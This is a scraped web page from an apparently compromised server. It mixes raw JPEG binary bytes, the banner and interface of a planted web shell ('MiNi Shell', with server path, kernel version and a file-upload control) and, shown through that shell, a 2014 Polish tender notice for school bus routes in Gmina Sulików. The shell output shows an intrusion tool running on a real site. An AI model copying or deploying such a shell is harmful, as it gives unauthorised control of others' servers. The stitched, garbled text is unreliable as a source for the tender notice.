JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140618/206754-N-2014.html

<p class="kh_header"><b>Sulików: Dowozy i odwozy uczniów do szkół i przedszkola  na terenie Gminy Sulików w roku szkolnym 2014/2015 i 2015/2016.</b><br>
<b>Numer ogłoszenia: 206754 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulików , ul. Dworcowa 5, 59-975 Sulików, woj. dolnośląskie, tel. 75 7787613, faks 75 7756922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulikow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy i odwozy uczniów do szkół i przedszkola  na terenie Gminy Sulików w roku szkolnym 2014/2015 i 2015/2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dowozy i odwozy uczniów do szkół i przedszkola  na terenie Gminy Sulików w roku szkolnym 2014/2015 i 2015/2016.
Przewozy dotyczą dzieci objętych obowiązkiem szkolnym i rocznym przygotowaniem  przedszkolnym.
Przewozy obejmujące dowóz i odwóz uczniów odbywają się w dni nauki szkolnej  z wyłączeniem dni wolnych od nauki, określonych corocznie przez Ministra Edukacji Narodowej.
Dowozy uczniów odbywać się będą według rozkładu jazdy: 

TRASA NR 1: DOWÓZ UCZNIÓW DO ZESPOŁU SZKOŁY PODSTAWOWEJ 
W BIERNEJ ORAZ DOWÓZ UCZNIÓW DO ZESPOŁU SZKOŁY PODSTAWOWEJ 
I GIMNAZJUM W SULIKOWIE

Godziny odjazdów			Miejscowość 
	
	7:15				Radzimów Dolny
	7:20				Radzimów k/krzyża			
	7:24				Radzimów Górny		
	7:26			Radzimów Górny (Mleczarnia)		
	7:30				Bierna (szkoła)

Przewidywana ilość dzieci do przewiezienia na trasie Radzimów Dolny - Bierna (szkoła) wynosi 51 osób. 

Godziny odjazdów			Miejscowość 

7:35				Miedziana (świetlica)		
7:38			     Miedziana skrzyżowanie		
	7:40				Bierna (szkoła)			
	7:44			Radzimów Górny (Mleczarnia)
	7:45				Radzimów Górny 
	7:49				Radzimów Dolny 
	7:54				Sulików (przedszkole)
	7:55				Sulików (ZSPiG)

Przewidywana ilość dzieci do przewiezienia na trasie Miedziana (świetlica) - Bierna (szkoła) wynosi 23 osoby, na trasie Bierna (szkoła) - Sulików (ZSPiG) wynosi 37 osób

Odwozy uczniów odbywać się będą w godzinach:
 Przedszkole Publiczne w Sulikowie: 12:45, 
 Zespół Szkoły Podstawowej i Gimnazjum w Sulikowie : 12:50, 14:35
 Szkoła Podstawowa w Biernej: 13:10, 15:05

TRASA NR 2: DOWÓZ UCZNIÓW DO SZKOŁY PODSTAWOWEJ
W BIERNEJ ORAZ DOWÓZ UCZNIÓW DO ZESPOŁU SZKOŁY PODSTAWOWEJ I GIMNAZJUM W SULIKOWIE

Godziny odjazdów			Miejscowość 
	
	7:23				Wielichów
	7:25			Wielichów I
7:30				Łowin			
	7:35				Miedziana Wieś 
	7:38				Bierna 
	7:41			  Bierna (szkoła)

Przewidywana ilość dzieci do przewiezienia na trasie Wielichów - Łowin - Miedziana Wieś Bierna (szkoła) wynosi 38 osób w tym: 26 osób wysiada w Biernej (szkoła) pozostałe 12 osób jedzie do Sulikowa (ZSPiG).

Godziny odjazdów			Miejscowość 

	7:41			Bierna (szkoła)
7:51				Mała Wieś Górna		
	7:58			Sulików (przedszkole)
	8:00				Sulików (ZSPiG)


Na trasie Bierna (szkoła) - Sulików (ZSPiG) przewidywana ilość dzieci do przewiezienia wynosi 28 osób, w tym 16 osób  z Małej Wsi Górnej.

Odwozy uczniów odbywać się będą w godzinach:
 Przedszkole Publiczne w Sulikowie: 12:45, 
 Zespół Szkoły Podstawowej i Gimnazjum w Sulikowie : 12:50, 14:35
 Szkoła Podstawowa w Biernej: 13:10, 15:05


TRASA NR 3: DOWÓZ UCZNIÓW DO ZESPOŁU SZKOŁY PODSTAWOWEJ
I GIMNAZJUM W SULIKOWIE
Godziny odjazdów			Miejscowość 

	7:15				Mikułowa (PKS)
	7:17				Mikułowa (na górze)
	7:20				Mikułowa (Rozdzielnia)
	7:22				Mikułowa (PKP)
7:34				Studniska Górne Kolonia 
7:37				Studniska Górne (świetlica)
7:38				Studniska Dolne n/ż
7:39				Studniska Dolne n/ż (sklep)
	7:40				Studniska Dolne (szkoła)
	7:45				Sulików (przedszkole)
	7:47				Sulików (ZSPiG)

Przewidywana liczba dzieci do przewiezienia na trasie Mikułowa - Studniska Górne -Studniska Dolne -  Sulików (ZSPiG) wynosi 65 osób.

Odwozy uczniów odbywać się będą w godzinach:
 Przedszkole Publiczne w Sulikowie: 12:45, 
 Zespół Szkoły Podstawowej i Gimnazjum w Sulikowie : 12:50, 14:35

TRASA NR 4: DOWÓZ UCZNIÓW DO ZESPOŁU SZKOŁY PODSTAWOWEJ 
I GIMNAZJUM W SULIKOWIE

Godziny odjazdów				Miejscowość 

7:25	Stary Zawidów 
	7:30 				 Stary Zawidów n/ż
7:34					Zawidów Rynek
	7:37					Skrzydlice 
	7:40					Wrociszów Górny 
	7:50					Sulików (przedszkole)
	7:55					Sulików (ZSPiG)

Przewidywana ilość dzieci do przewiezienia na trasie Stary Zawidów - Sulików (ZSPiG) wynosi 46 osób.

Odwozy uczniów odbywać się będą w godzinach:
 Przedszkole Publiczne w Sulikowie: 12:45, 
 Zespół Szkoły Podstawowej i Gimnazjum w Sulikowie : 12:50, 14:35

TRASA NR 5: DOWÓZ UCZNIÓW DO SZKOŁY PODSTAWOWEJ 
I GIMNAZJUM W SULIKOWIE

Godziny odjazdów			Miejscowość 

	7:25				Ksawerów
	7:27				Ksawerów Las
	7:32				Wilka Skrzyżowanie
	7:35				Wilka 
	7:38				Wilka-Bory
	7:46				Wrociszów Dolny 
	7:56				Sulików (przedszkole)
	7:58				Sulików (ZSPiG)

Przewidywana ilość dzieci do przewiezienia na trasie Ksawerów - Sulików (ZSPiG) wynosi 24 osoby.

Odwozy uczniów odbywać się będą w godzinach:
 Przedszkole Publiczne w Sulikowie: 12:45.
 Zespół Szkoły Podstawowej i Gimnazjum w Sulikowie : 12:50, 14:35

5. Ilość dzieci na trasie odwozów nie będzie pokrywała się z ilością dzieci na trasie przywozów. Dokładna ilość dzieci na poszczególnych trasach będzie znana na początku roku szkolnego, po ustaleniu planu lekcji przez dyrektorów szkół. 

6. Zamawiający dopuszcza możliwość zmiany godzin przywozu oraz godzin  odwozu dzieci ze szkół.

7. Zamawiający zastrzega sobie prawo do zmian w zakresie liczby dzieci, o czym każdorazowo poinformuje Wykonawcę bez potrzeby sporządzania aneksu do umowy, jeżeli zmiany te nie będą skutkowały koniecznością wykorzystania większej liczby autobusów niż wynika to z SIWZ. Zwiększenie liczby dowożonych dzieci, powodujące konieczność wykorzystania większej liczby pojazdów, niż wynika to z SWIZ, będzie skutkować wprowadzeniem aneksów do umowy. 

8. Wykonawca zapewnia najwyższy poziom usług, sprawność techniczną pojazdu, a także odpowiednie kwalifikacje zawodowe kierowcy.

9. Wykonawca dysponuje oznaczonymi pojazdami przystosowanymi do przewozu dzieci i młodzieży szkolnej spełniającymi wszystkie wymogi bezpieczeństwa związane z przewozem pasażerskim, o którym mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym 
(Dz. U. z 2013 r. poz. 1414) i ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym  ( Dz. U. z 2012 r., poz. 1137 z późn. zm.). W szczególności pojazdy samochodowe, które będą użyte do realizacji zamówienia muszą posiadać aktualne badania techniczne dopuszczające pojazd do ruchu. 

10. Wykonawca zobowiązuje się do dowożenia i odwożenia dzieci na przystanki wskazane przez Zamawiającego oraz każdorazowego skontrolowania przez kierowcę prawidłowości zamknięcia wszystkich wejść do autobusu.

11. Wykonawca powinien zapewnić odpowiednią liczbę miejsc siedzących na określonej trasie.

12.W przypadku spadku temperatury na dworze poniżej 5oC Wykonawca zobowiązuje się ogrzewać autobusy w czasie przewożenia uczniów.

13. Wykonawca zobowiązany jest niezwłocznie powiadomić Zamawiającego i w razie potrzeby odpowiednie jednostki Policji o każdej awarii lub wypadku autobusu.

14. W przypadku awarii lub wypadku autobusu Wykonawca zobowiązany jest podstawić niezwłocznie i przewieźć dzieci innym autobusem, zapewniając bezpieczeństwo dzieci.

15. W przypadkach, o których mowa w pkt. 14 Wykonawca zobowiązuje się przewieźć dzieci do poszczególnych przystanków w czasie nie dłuższym niż jedna godzina od planowanej pory przybycia autobusu na dany przystanek.

16. Wykonawca jest zobowiązany do zrekompensowania wszelkich szkód wynikających z wypadków lub wszelkiego rodzaju zdarzeń wynikłych w czasie wykonywania usługi. Wykonawca przedkłada Zamawiającemu kopię polisy OC w zakresie prowadzonej działalności, a w przypadku jej wygaśnięcia w czasie trwania umowy dodatkowo przedkłada kopię aktualnej polisy.

17. Zamawiający dopuszcza możliwość zmiany trasy przewozów w ramach niniejszej umowy, a także miejsc przystankowych, jak i godzin przewozów wynikających ze zmian nauki w szkole.

18. Zamawiający, sporządzi imienne listy uczniów uprawnionych do przejazdów na określonej trasie, które przekaże Wykonawcy na początku roku szkolnego. W przypadku zmian dane te będą na bieżąco aktualizowane.

19. Wykonawca może wydawać uczniom imienne bilety miesięczne uprawniające do korzystania z komunikacji realizowanej przez Wykonawcę.

20. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów.

21. Opiekę nad dziećmi w czasie przewozów organizuje i zapewnia Wykonawca.

22. W każdym autobusie zapewniona musi być osoba, która będzie sprawowała opiekę nad dowożonymi dziećmi.

23. Opieka obejmuje uczniów podczas wsiadania, przejazdu i wysiadania.

24. Na Wykonawcy spoczywa obowiązek poinformowania opiekuna o obowiązkach i odpowiedzialności..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 5.000,- PLN  (słownie złotych: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć aktualną na dzień składania ofert licencję na wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek (zał. Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi wykazać, że dysponuje min. 5 autobusami o ilości miejsc odpowiadającej liczbie dzieci przewożonych na poszczególnych trasach oraz dysponuje dodatkowym środkiem transportu w przypadku awarii (zał. Nr 3 do SIWZ). Jeżeli Wykonawca wskazał pojazdy, którymi będzie dysponował, należy przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia tych pojazdów na okres realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania osób zdolnych do wykonywania zamówienia zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek (zał. Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  w wysokości co najmniej 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany niniejszej umowy wymagają formy pisemnej w formie aneksu pod rygorem nieważności. 
2. Nieważna jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, oprócz sytuacji, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sulikow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sulików
ul. Dworcowa nr 5
59 - 975 Sulików.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 09:50, miejsce: Urząd Gminy Sulików
ul. Dworcowa nr 5 (Biuro Obsługi Klienta)
59 - 975 Sulików.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com